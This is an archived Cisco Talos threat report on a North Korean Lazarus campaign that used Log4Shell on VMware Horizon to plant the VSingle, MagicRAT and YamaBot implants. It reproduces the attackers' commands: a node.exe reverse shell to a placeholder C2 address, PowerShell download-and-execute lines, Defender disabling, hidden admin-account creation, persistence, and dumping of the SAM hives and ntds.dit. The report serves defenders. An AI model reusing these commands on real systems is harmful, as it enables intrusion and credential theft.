{ "id": "61c735bb-59d2-4f96-be84-427dae7b80db", "created_at": "2026-04-06T00:11:50.05931Z", "updated_at": "2026-04-10T03:38:19.91727Z", "deleted_at": null, "sha1_hash": "f25826652b1c6ec00e81e49eedbeb68475535d76", "title": "Lazarus and the tale of three RATs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1275835, "plain_text": "Lazarus and the tale of three RATs\r\nBy Asheer Malhotra\r\nPublished: 2022-09-08 · Archived: 2026-04-05 18:23:39 UTC\r\nThursday, September 8, 2022 08:01\r\nCisco Talos has been tracking a new campaign operated by the Lazarus APT group, attributed to North Korea by\r\nthe United States government.\r\nThis campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain an initial foothold into\r\ntargeted organizations.\r\nTargeted organizations include energy providers from around the world, including those headquartered in the\r\nUnited States, Canada and Japan.\r\nThe campaign is meant to infiltrate organizations around the world for establishing long term access and\r\nsubsequently exfiltrating data of interest to the adversary's nation-state.\r\nTalos has discovered the use of two known families of malware in these intrusions — VSingle and YamaBot.\r\nTalos has also discovered the use of a recently disclosed implant we're calling \"MagicRAT\" in this campaign.\r\nCisco Talos observed North Korean state-sponsored APT Lazarus Group conducting malicious activity between\r\nFebruary and July 2022. Lazarus has been previously attributed to the North Korean government by the U.S.\r\nCybersecurity and Infrastructure Security Agency (CISA). The entry vectors involve the successful exploitation of\r\nvulnerabilities in VMWare products to establish initial footholds into enterprise networks, followed by the deployment\r\nof the group's custom malware implants,VSingle and YamaBot. In addition to these known malware families, we have\r\nalso discovered the use of a previously unknown malware implant we're calling \"MagicRAT.\"\r\nThis campaign was previously partially disclosed by other security firms, but our findings reveal more details about the\r\nadversary's modus operandi. We have also observed an overlap of command and control (C2) and payload-hosting\r\ninfrastructure between our findings and the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) June\r\nadvisory that detailed continued attempts from threat actors to compromise vulnerable VMWare Horizon servers.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 1 of 25\n\nIn this research, we illustrate Lazarus Group's post-exploitation tactics, techniques and procedures (TTPs) to establish a\r\nfoothold, perform initial reconnaissance, deploy bespoke malware and move laterally across infected enterprises. We\r\nalso provide details about the activities performed by the attackers when the VSingle backdoor is instrumented on the\r\ninfected endpoints.\r\nIn this campaign, Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of\r\nthese attacks was likely to establish long-term access into victim networks to conduct espionage operations in support\r\nof North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical\r\ninfrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.\r\nAttribution\r\nCisco Talos assesses with high confidence these attacks have been conducted by the North Korean state-sponsored\r\nthreat actor Lazarus Group. During our investigations, we identified three distinct RATs being employed by the threat\r\nactors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese\r\nCERT (JPCERT/CC) recently published reports (VSingle,YamaBot), describing them in detail and attributed the\r\ncampaigns to the Lazarus threat actor.\r\nThe TTPs used in these attacks also point to the Lazarus threat actor. The initial vector was the exploitation of the Log4j\r\nvulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit\r\nfrom web servers. The same initial vector, URL patterns and similar subsequent hands-on-keyboard activity have been\r\ndescribed in this report from AhnLab from earlier this year. There are also overlapping IOCs between the campaign\r\ndescribed by AhnLab and the current campaign, such as the IP address84[.]38.133[.]145, which was used as a hosting\r\nplatform for the actors' malicious tools. Although the same tactics have been applied in both attacks, the resulting\r\nmalware implants deployed have been distinct from one another, indicating the wide variety of implants available at the\r\ndisposal of Lazarus. Additionally, we've also observed similarities in TTPs disclosed by Kaspersky attributed to the\r\nAndariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware.\r\nWhile Kaspersky discovered the use of Dtrack and Maui, we've observed the use of VSingle, YamaBot and MagicRAT.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 2 of 25\n\nCisco Talos acknowledges that when analyzed individually, the attribution evidence only reaches medium-confidence,\r\nhowever, we're raising our confidence level when analyzing all these points in the context of the campaign and victims.\r\nCampaign\r\nCisco Talos has observed several attacks targeting multiple victims. In this section, we detail two specific attack\r\ninstances that we assess have been the most representative of the playbooks employed by Lazarus in this campaign:\r\nVictim 1: Illustrates the kill chain from exploitation to actions on objectives. This intrusion also illustrates the\r\nuse of the VSingle implant.\r\nVictim 2: Represents a kill chain similar to Victim 1 but in this instance, we observed the deployment of a new\r\nimplant we're calling \"MagicRAT\" along with VSingle.\r\nA third intrusion set worth noting here is one where we saw the use of a third bespoke implant known as YamaBot.\r\nYamaBot was recently disclosed and attributed to the Lazarus APT by the Japan Computer Emergency Response Team\r\nCoordination Center (JPCERT/CC).\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 3 of 25\n\nVictim No. 1: VSingle and beyond\r\nIn the case of the first victim, we observed the exploitation of publicly known vulnerabilities to ultimately deploy the\r\nVSingle backdoor on infected endpoints to establish long-term access.\r\nIn this specific instance, we also observed the actual instrumentation of VSingle implants to carry out additional\r\nmalicious activities on the infected systems. The flow below provides an overview of the attacker's playbook, which\r\nwill be detailed in the sections ahead.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 4 of 25\n\nExploitation and foothold\r\nCisco Talos identified the exploitation of the Log4Shell vulnerability on VmWare Horizon public-facing servers as the\r\ninitial attack vector [T1190]. The compromise is followed by a series of activities to establish a foothold [TA0001] on\r\nthe systems before the attackers deploy additional malware and move laterally across the network. During our\r\ninvestigation, we discovered two different foothold payloads. In the first, the attackers abusenode.exe, which is shipped\r\nwith VMware to execute the onelinernode.exescript below.\r\nC:\"Program Files\"\\VMware\"VMware View\"\\Server\\appblastgateway\\node.exe -r net -e \"sh =\r\nrequire('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(\u003cPort\u003e, '\u003cC2_IP\u003e', function()\r\n{client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});\"\r\nThis essentially opens an interactive reverse shell that attackers could use to issue arbitrary commands on the infected\r\nentry endpoint.\r\nIn another instance, we observed the attackers exploiting vulnerabilities in VMWare to launch custom PowerShell\r\nscripts on the infected endpoint via VMWare'sws_ConnectionServer.exe:\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 5 of 25\n\npowershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://\u003cremote_location\u003e/\u003cfilename\u003e.ps1')\r\nSince VMWare Horizon is executed with administrator privileges, the attacker doesn't have to worry about elevating\r\ntheir privileges.\r\nAfter the interactive shell is established, the attackers perform a preliminary reconnaissance on the endpoint to get\r\nnetwork information and directory listings [T1083], [T1590], [T1518]:\r\nipconfig /all\r\ndir c:\"Program Files (x86)\r\ndir c:\"Program Files\r\nThe next step is the deactivation of the Windows Defender components [T1562]. This is done through registry key\r\nchanges, WMIC commands and PowerShell commands. The list below contains the full list of methods Cisco Talos\r\nobserved.\r\npowershell -exec bypass -Command Get-MpPreference\r\npowershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true\r\nreg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time\r\nProtection /s /f DisableRealtimeMonitoring\r\nOnce the AV on the system has been bypassed using the reverse shell, the attackers then deploy the actual malware\r\nimplant from a malware family known to be developed and operated by Lazarus called \"VSingle.\"\r\nThe deployment consists of downloading a copy of the legitimate WinRAR utility from a remote location controlled by\r\nthe attackers along with an additional payload (archive) [T1608]:\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('\u003cremote_location\u003e\\\\rar.tmp', '\u003clocal_path\u003e\\\\rar.exe')\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('\u003cremote_location\u003e\\\\update.tmp \u003clocal_path\u003e\\\\java.tmp')\r\n\u003clocal_path\u003e\\\\rar.exe e \u003clocal_path\u003e\\\\java.tmp \u003clocal_path_2\u003e -hp!no!\r\nThe archive downloaded to the infected endpoint is decompressed and consists of the VSingle malware executable\r\nwhich is optionally renamed and then persisted on the endpoint by creating an auto-start service.\r\nHow is VSingle used?\r\nOur investigations led to the discovery of commands fed to the VSingle backdoor by the attackers to carry out a variety\r\nof activities such as reconnaissance, exfiltration and manual backdooring.\r\nThe actor starts by performing additional reconnaissance tasks by running the commands below [T1083], [T1590].\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 6 of 25\n\nCommand Intent\r\nsysteminfo \u0026 ipconfig /all \u0026 netstat -naop tcp \u0026 tasklist \u0026 net user \u0026 net view \u0026\r\narp -a\r\nSystem Information\r\nDiscovery [T1082]\r\nquery user\r\nSystem Information\r\nDiscovery [T1082]\r\nwhoami\r\nSystem Information\r\nDiscovery [T1082]\r\ndir /a %appdata%\\microsoft\r\nSystem Information\r\nDiscovery [T1082]\r\ndir /a C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\microsoft\r\ncmd.exe /u /c dir /a c:\\users\\administrator\r\nSystem Information\r\nDiscovery [T1082]\r\ncmd /C pwd\r\ncmd /C dir\r\ncmd /C cd c:\\\\Users\\\\\u003cusername\u003e\\Download \u0026 dir\r\ncmd /C cd c:\\\\Users\\\\\u003cusername\u003e\\Downloads \u0026 dir\r\ncmd /C cd c:\\\\Users\\\\\u003cusername\u003e \u0026 dir\r\ncmd /C cd c: \u0026 dir\r\ncmd /C tree c:\\\\Users\r\nSystem Information\r\nDiscovery [T1082]\r\ncmd.exe /u /c time /t\r\ncmd.exe /u /c query session\r\nSystem Information\r\nDiscovery [T1082]\r\nThese commands will give the operators a solid understanding of the system they are in, including the installed\r\nsoftware, network configuration and system users, among other things. This kind of information is crucial to preparing\r\nfor lateral movement activities.\r\nThe attackers also force the system to cache credentials so that it is possible to harvest them afterward [T1003/005].\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t\r\nREG_DWORD /d 1 /f\r\nThe other configuration changes made to the victim host are intended to provide the attackers with their own admin-level users [T1136].\r\nCommand Intent\r\ncmd.exe /u /c net user \u003cuserid\u003e \u003cpassword\u003e /add Create user\r\ncmd.exe /u /c reg add HKLM\\software\\microsoft\\windows\r\nnt\\currentversion\\winlogon\\specialaccounts\\userlist /v \u003cusername\u003e /t REG_DWORD /d 0 /f\r\nAdd\r\nprivileges\r\ncmd.exe /u /c net localgroup Administrators /add \u003cusername\u003e\r\ncmd.exe /u /c net localgroup Remote Desktop Users /add \u003cusername\u003e\r\nAdd\r\nprivileges\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 7 of 25\n\nCommand Intent\r\ncmd.exe /u /c net localgroup Administrateur /add \u003cusername\u003e\r\ncmd.exe /u /c net localgroup Administrateurs /add \u003cusername\u003e\r\nAdd\r\nprivileges\r\ncmd.exe /u /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v\r\nAllowMultipleTSSessions /t REG_DWORD /d 1 /f\r\nSystem\r\nconfig -\r\nAllow\r\nmultiple\r\nsessions\r\ncmd.exe /u /c reg add\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\r\n/v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nSystem\r\nconfig -\r\ndisable UAC\r\ncmd.exe /u /c reg add HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa /v\r\nLmCompatibilityLevel /t REG_DWORD /d 0 /f\r\nSystem\r\nconfig - LAN\r\nMan\r\ncompatibility\r\nThese could be used if the RAT is detected/removed or even provide the actors with an RDP access, avoiding the use of\r\na malicious tool.\r\nWith VSingle in place, the attackers can access other systems with the help of two additional tools.\r\npvhost.tmp renamed to pvhost.exe, which is actually plink.exe, a utility from Putty that can create SSH tunnels\r\nbetween systems.\r\nosc.tmp renamed to osc.exe, which we assess with high confidence is 3proxy. Unfortunately, Cisco Talos could\r\nnot obtain a copy of the file.\r\nThese two tools working together create a proxy on the victim system which has its listening port \"exported\" to a port\r\non a remote host. This mechanism allows the attacker to have a local proxy port that gives access to the victim network\r\nas if the attacker's box was on it directly.\r\nFirst, the attackers start the osc.exe (3proxy) to listen on a loopback port (in this example, we chose 8118), with the\r\ncommand below.\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\microsoft\\osc.exe -i127.0.0.1 -p8118\r\nThis alone wouldn't help the attackers, they actually need to have port 8118, exposed on their own network that they can\r\nconnect to. So, they created an SSH tunnel using Plink, but they forwarded a local port to a remote address, in this case,\r\na remote server controlled by the attackers:\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\microsoft\\pvhost.exe -N -R 18118:127.0.0.1:8118 -P\r\n[Port] -l [username] -pw [password] \u003cRemote_IP\u003e\r\nThe option -R forwards the port8118 on127.0.0.1to the remote server on port18118.\r\nVSingle RAT Analysis\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 8 of 25\n\nThe VSingle loader executable is an MFC-based backdoor that consists of multiple layers. The first is responsible for\r\ndecoding and executing the next layer (layer 2), a shellcode in the memory of the implant process. The shellcode is\r\nsimply an injector for the next layer (layer 3, also shellcode). The implant spawns a new \"explorer.exe\" process and\r\ninjects shellcode (layer 3) into it for execution.\r\nThe layer 3 shellcode is injected into a newly spawned benign process, such as explorer.exe, which consists of decoding\r\nanother layer (layer 4) of shellcode that is then executed in the benign process.\r\nLayer 4 is the actual VSingle implant DLL loaded reflectively into the memory of the benign process.\r\nThe implant is simple in terms of functionalities and is basically a stager that enables the attackers to deploy more\r\nmalware on the infected system. It also includes the ability to open a reverse shell that connects to the C2 server and\r\nallows untethered access to the attackers to the endpoint to execute commands via \"cmd.exe.\"\r\nAlthough a rather simple RAT, VSingle can download and execute additional plugins from the C2 server. These plugins\r\ncan either be in the form of shellcode or script files of specific formats served by the C2. The image below shows the\r\ncode used to execute a shellcode downloaded.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 9 of 25\n\nIn-memory shellcode execution by the implant.\r\nFor simpler cases, the implant can receive executables or scripts, save them into a file in the%temp%directory and\r\nexecute them on the endpoint. The implant supports the .vbs, .bat and .tmp files, since all of them are executed through\r\n\"cmd /c.\" The .tmp files can also be loaded as executables (.exe).\r\nThe implant can achieve persistence for malware artifacts served and specified by the C2 server. The simpler\r\nmechanism is the creation of a file in the Startup folders, which is done in two different locations:\r\nc:\\Documents and Settings\\%s\\Start Menu\\Programs\\Startup\\%s\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\r\nAdditionally, there are three other ways available, all of which use the \"cmd.exe /c\" command, that the VSingle\r\noperators can use:\r\nCommand Intent\r\nsc create \"%s\" DisplayName= \"%s\" type= own type= interact start= auto error=\r\nignore binpath= \"cmd.exe /k start \\\"\\\" \\\"%s\\\"\r\nAuto start Service Creation\r\n[T1543/003]\r\nreg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v \"%s\" /t\r\nREG_SZ /d \"%s\" /f\r\nRun registry key [T1547/001]\r\nschTasks /Create /F /TN \"%s\" /TR \"%s\" /SC onlogon\r\nScheduled task triggered at\r\nlogon [T1053/005]\r\nschtasks /create /tn \u003ctask_name\u003e /tr C:\\\\Windows\\\\upsvc.exe /sc onstart /ru\r\nSystem /rl highest /f\r\nScheduled task triggered at\r\nsystem start with high priority\r\n[T1053/005]\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 10 of 25\n\nVictim No. 2: The discovery of MagicRAT\r\nIn another victim's network, we saw a similar chain of events: initial recon followed by disabling the AV software and\r\nthe deployment of a bespoke implant. We also observed successful lateral movement into other endpoints in the\r\nenterprise.\r\nWhat's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before\r\nthe attackers deployed VSingle on the infected systems.\r\nThis implant called \"MagicRAT\" is outlined in a recently published post. The reverse interactive shell eventually\r\ndownloads MagicRAT from a remote location.\r\nMagicRAT Analysis\r\nIn this campaign, MagicRAT was configured with a different configuration file and path. It also reported to different C2\r\nservers. The configuration directory is now called \"MagicMon\" in the current user's \"AppData\\Roaming\" directory. As\r\nseen in the screenshot below, this folder creates and hosts an initialization file named \"MagicSystem.ini.\" This INI file\r\ncontains several configurations including the list of C2 URLs that can be used by the implant to send and receive\r\ncommands and data.\r\nINI file containing the list of base64 encoded C2 URLs.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 11 of 25\n\nLateral Movement\r\nDuring the first few days after the successful initial access, the attackers conducted limited reconnaissance of the\r\nendpoint and deployed two different malware families MagicRAT and VSingle on the infected endpoint to maintain\r\ncovert access to the system. Just like with the first victim, the attackers then started to perform Active Directory (AD)\r\nrelated explorations (via impacket and VSingle) to identify potential endpoints to laterally move into. The table below\r\nillustrates the commands executed to perform such actions.\r\nCommand Intent\r\npowershell.exe Get-NetUser 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e 2\u003e\u00261 User Discovery [T1033]\r\npowershell.exe Get-ADDomain 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e\r\n2\u003e\u00261\r\nAccount/Domain Discovery\r\n[T1087]\r\npowershell.exe Get-ADUser \u003cserver\u003e -Properties * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nUser Discovery [T1033]\r\npowershell.exe Get-ADUser -Filter * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nUser Discovery [T1033]\r\npowershell.exe Get-ADGroup -filter * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nAccount/Domain Discovery\r\n[T1087]\r\npowershell.exe Get-AdComputer -filter * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nSystem Information\r\nDiscovery [T1082]\r\npowershell.exe Get-ADComputer -filter {OperatingSystem -Like '*Windows\r\n10*'} -property * | select name, operatingsystem\r\nSystem Information\r\nDiscovery [T1082]\r\nnslookup \u003cremote_computername\u003e\r\nAccount/Domain Discovery\r\n[T1087]\r\npowershell.exe Get-WMIObject -Class win32_operatingsystem -Computername\r\n\u003cremote_computername\u003e\r\nSystem Information\r\nDiscovery [T1082]\r\npowershell.exe Get-ADUser -Filter * | Select SamAccountName User Discovery [T1033]\r\npowershell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount User Discovery [T1033]\r\npowershell.exe Get-AdComputer -Filter * -Properties * | select Name,\r\nLastLogonDate, lastLogon, IPv4Address\r\nAccount/Domain Discovery\r\n[T1087]\r\nOnce the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to\r\nverify if they are reachable (with an occasional tracert). VSingle deployment on new hosts was done by using WMIC to\r\nstart a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote\r\nsystem [T1608/001].\r\nWMIC /node:\u003cComputer_Name\u003e process call create \"powershell.exe (New-Object\r\nSystem.Net.Webclient).DownloadFile('\u003cremote_location\u003e/svhostw.exe','\u003clocal_path\u003e\\\\svhostww.exe')\"\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 12 of 25\n\nIn some infections, we observed the deployment of impacket tools on other endpoints to move laterally and establish an\r\ninteractive shell.\r\nThis stage of the attacks was clearly manual work performed by a human operator. While trying to establish interactive\r\nremote console sessions, we can see the operators making errors on the commands.\r\nTry # Command Result\r\n1 Enter-PSSession \u003cComputerName\u003e Failed attempt\r\n2 Enter-PSSession Failed attempt\r\n3 powershell.exe Enter-PSSession Correct command\r\nThe attackers typically take their time to explore the infected system by obtaining file listings of multiple directories of\r\ninterest to them. When files of particular interest are found they are put into a .rar archive for exfiltration, typically via\r\none of the custom-developed implants running on the system.\r\nVictim No. 3: VSingle makes way for YamaBot\r\nDuring one particular intrusion, the attackers first deployed VSingle on the endpoint. However, after the VSingle\r\nsample was detected, the attackers were at risk of losing access to the enterprise. Therefore, after repeated failed\r\nattempts to deploy VSingle on the endpoints, the attackers then deployed another updated copy of VSingle. After\r\nmaintaining continued access for a while, the attackers then moved on to the use of another implant — YamaBot.\r\nYamaBot is a custom-made GoLang-based malware family. It uses HTTP to communicate with its C2 servers. It\r\ntypically begins by sending preliminary system information about the infected endpoint to the C2: computer name,\r\nusername and MAC address.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 13 of 25\n\nYamaBot's helper function names.\r\nThis implant has standard RAT capabilities, including the ability to:\r\nList files and directories.\r\nSend process information to C2.\r\nDownload files from remote locations.\r\nExecute arbitrary commands on the endpoints.\r\nUninstall itself.\r\nYamaBot was recently attributed to the Lazarus APT group by JPCERT who provided an excellent analysis of the\r\nimplant.\r\nCredential Harvesting\r\nApart from the usual recon and deployment of the custom implants, we also observed Lazarus' use of completely\r\ndifferent TTPs for credential harvesting. The attackers created backups of volumes that were then used to create a copy\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 14 of 25\n\nof the \"ntds.dit\" file for exfiltration containing Active Directory data.\r\nCommand Intent\r\nvssadmin list shadows /for=C: ^\u003e \u003clocal_path\u003e\\\u003clog_file\u003e \u003e \u003clocal_path\u003e\\execute.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c \u003clocal_path\u003e\\execute.bat \u0026 del \u003clocal_path\u003e\\execute.bat\r\nSystem\r\nInformation\r\nDiscovery\r\n[T1082]\r\nvssadmin create shadow /For=C: ^\u003e \u003clocal_path\u003e\\\u003clog_file\u003e \u003e \u003clocal_path\u003e\\execute.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c \u003clocal_path\u003e\\execute.bat \u0026 del \u003clocal_path\u003e\\execute.bat\r\nOS Credential\r\nDumping:\r\nNTDS\r\n[T1003/003]\r\ncmd.exe /C copy \\\\?\r\n\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit\r\n\u003clocal_path\u003e\\phPzFvOU.tmp ^\u003e \u003clocal_path\u003e\\\u003clog_file\u003e \u003e \u003clocal_path\u003e\\execute.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c \u003clocal_path\u003e\\execute.bat \u0026 del \u003clocal_path\u003e\\execute.bat\r\nOS Credential\r\nDumping:\r\nNTDS\r\n[T1003/003]\r\nThe Variations in the playbook\r\nThe overall structure of the infection chains remained the same across multiple intrusions in this campaign, primarily\r\nconsisting of the cyber kill chain that we illustrated at the beginning of the campaign section.\r\nHowever, there were some key variations that consist of some optional activities conducted by the adversary in different\r\nintrusion sets. These variations include the use of:\r\nCredential harvesting using tools such as Mimikatz and Procdump.\r\nProxy tools to set up SOCKs proxies.\r\nReverse tunneling tools such as PuTTY's plink.\r\nIt is therefore necessary to list all the TTPs used by the adversary across all the intrusions we've discovered in this\r\ncampaign. This section provides an additional list of TTPs and commands used by the operators along with their\r\ncorresponding MITRE ATT\u0026CK IDs to help defenders better understand this APT's offensive playbook.\r\nNote: There is some overlap between operations (common or similar commands) carried out via the reverse shell, the\r\nVSingle RAT and impacket tools. This could be because there might be multiple human operators manually executing\r\ntheir own set of commands based on their shift days and timings (without proper handover of information collected and\r\npercolated from one operator to another).\r\nFor example, in one instance, the attackers tried to obtain Active Directory information on one endpoint via PowerShell\r\ncmdlets. However, a day later, the attackers used adfind.exe to extract similar information on the same endpoint.\r\nDisabling AV components\r\nThe threat actors used multiple variations of commands to query information about the installed antivirus software on\r\nthe endpoints, followed by disabling the Windows Defender antivirus.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 15 of 25\n\nCommand Intent\r\ncmd /C wmic /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get\r\ndisplayname\r\nSecurity\r\nSoftware\r\nDiscovery\r\n[T1518/001]\r\nwmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get /format:list\r\nSecurity\r\nSoftware\r\nDiscovery\r\n[T1518/001]\r\ncmd.exe /Q /c wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct GET\r\ndisplayName, productState, pathToSignedProductExe 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003clog_file_name\u003e 2\u003e\u00261\r\nSecurity\r\nSoftware\r\nDiscovery\r\n[T1518/001]\r\ncmd.exe /c powershell -exec bypass -Command Get-MpPreference\r\nSecurity\r\nSoftware\r\nDiscovery\r\n[T1518/001]\r\npowershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -\r\nDisableRealtimeMonitoring $true\r\nImpair Defenses\r\n[T1562/001]\r\nreg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\r\nDefender\\\\Real-Time Protection /s /f DisableRealtimeMonitoring\r\nImpair Defenses\r\n[T1562/001]\r\npowershell -exec bypass -Command Set-MpPreference -SubmitSamplesConsent\r\nNeverSendpowershell -exec bypass -Command Set-MpPreference -MAPSReporting Disable\r\nImpair Defenses\r\n[T1562/001]\r\ncmd.exe /c reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender /v\r\nDisableAntiSpyWare /t REG_DWORD /d 1\r\nImpair Defenses\r\n[T1562/001]\r\nReconnaissance\r\nDuring the reconnaissance and credential harvesting stage, the attackers gather information about the system, the\r\nnetwork — including the domain — and the installed software. Using a WMIC command, the attackers also collect\r\ninformation about the logical drives of the infected systems.\r\nThen, the attackers harvest and exfiltrate credentials. During the reconnaissance stage, the attackers specifically check if\r\nthe RDP port is open. If it is and the attackers decrypt any of the harvested credentials, they would have direct access to\r\nthe system without the need to install any other backdoor. The complete list of commands is provided in the table\r\nbelow.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 16 of 25\n\nCommand Intent\r\ncmd.exe /c ipconfig /all\r\nNetwork discovery\r\n[T1590]\r\ncmd.exe /c dir c:\"Program Files (x86)\r\nInstalled software\r\n[T1518]\r\ncmd.exe /c dir c:\"Program Files\r\nInstalled software\r\n[T1518]\r\ncmd.exe /c systeminfo\r\nSystem\r\nInformation\r\nDiscovery [T1082]\r\ncmd /C qwinsta\r\nUser Discovery\r\n[T1033]\r\ncmd /C nslookup\r\nNetwork discovery\r\n[T1590]\r\ncmd /C netstat -noa | findstr 3389\r\nNetwork discovery\r\n[T1590]\r\ncmd /C net view /domain\r\nDomain discovery\r\n[T1087/002]\r\ncmd /C wmic logicaldisk get deviceid, size\r\nSystem\r\nInformation\r\nDiscovery [T1082]\r\ncmd.exe /c reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\r\nServer\\WinStations\\RDP-Tcp\r\nSystem\r\nInformation\r\nDiscovery [T1082]\r\ncmd.exe /Q /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:20 /q:*[System [(EventID=25)]] /rd:true /f:text 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nQuery event logs -\r\nGet RDP session\r\nreconnection\r\ninformation\r\nnetsh advfirewall firewall add rule name=allow RemoteDesktop dir=in protocol=TCP\r\nlocalport=3389 action=allow\r\nModify Firewall\r\n[T1562/004]\r\nreg.exe add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\r\nServer\\WinStations\\RDP-Tcp /v PortNumber /t REG_DWORD /d 3389 /f\r\nConfigure RDP\r\n[T1021/001]\r\nCredential harvesting\r\nIn some intrusions, the attackers saved copies of registry hives for subsequent exfiltration for obtaining credentials and\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 17 of 25\n\npolicy information.\r\nCommand Intent\r\ncmd.exe /c reg save hklm\\sam \u003clocal_path\u003e\\zsam.tmp\r\nCredential harvesting\r\n[T1003]\r\ncmd.exe /c reg save hklm\\security \u003clocal_path\u003e\\zsec.tmp\r\nCredential harvesting\r\n[T1003]\r\ncmd.exe /c reg save hklm\\system \u003clocal_path\u003e\\zsys.tmp\r\nCredential harvesting\r\n[T1003]\r\n\u003clocal_path\u003e\\rar.exe a \u003clocal_path\u003e\\zzzzz.tmp \u003clocal_path\u003e\\zs*.tmp\r\nArchive Collected\r\nData [T1560]\r\ncmd.exe /c copy /y \u003clocal_path\u003e\\zzzzz.tmp c:\"Program Files\\\"VMware\r\nView\\server\\broker\\webapps\\portal\\webclient\\z.tmp\r\nArchive Collected\r\nData [T1560]\r\nThe attackers also typically use a malicious batch (.bat) file called \"adfind.bat\" to execute adfind.exe on some of the\r\ninfected endpoints to get AD information from the endpoints.\r\nWe also observed the use of dsquery to obtain similar information.\r\nCommand Intent\r\ncmd.exe /Q /c echo dsquery computer ^\u003e \\\\127.0.0.1\\C$\\\u003cimpacket_log_file\u003e\r\n2^\u003e^\u00261\r\nDomain Account Discovery\r\n[T1087/002]\r\ncmd.exe /Q /c echo dsquery group -name GroupName ^\u003e \\\\127.0.0.1\\C$\\\r\n\u003cimpacket_log_file\u003e 2^\u003e^\u00261\r\nDomain Account Discovery\r\n[T1087/002]\r\ncmd.exe /Q /c echo dsquery computer -name ComputerName ^\u003e \\\\127.0.0.1\\C$\\\r\n\u003cimpacket_log_file\u003e 2^\u003e^\u00261\r\nDomain Account Discovery\r\n[T1087/002]\r\ncmd.exe /Q /c echo dsquery user -name UserName ^\u003e \\\\127.0.0.1\\C$\\\r\n\u003cimpacket_log_file\u003et 2^\u003e^\u00261\r\nDomain Account 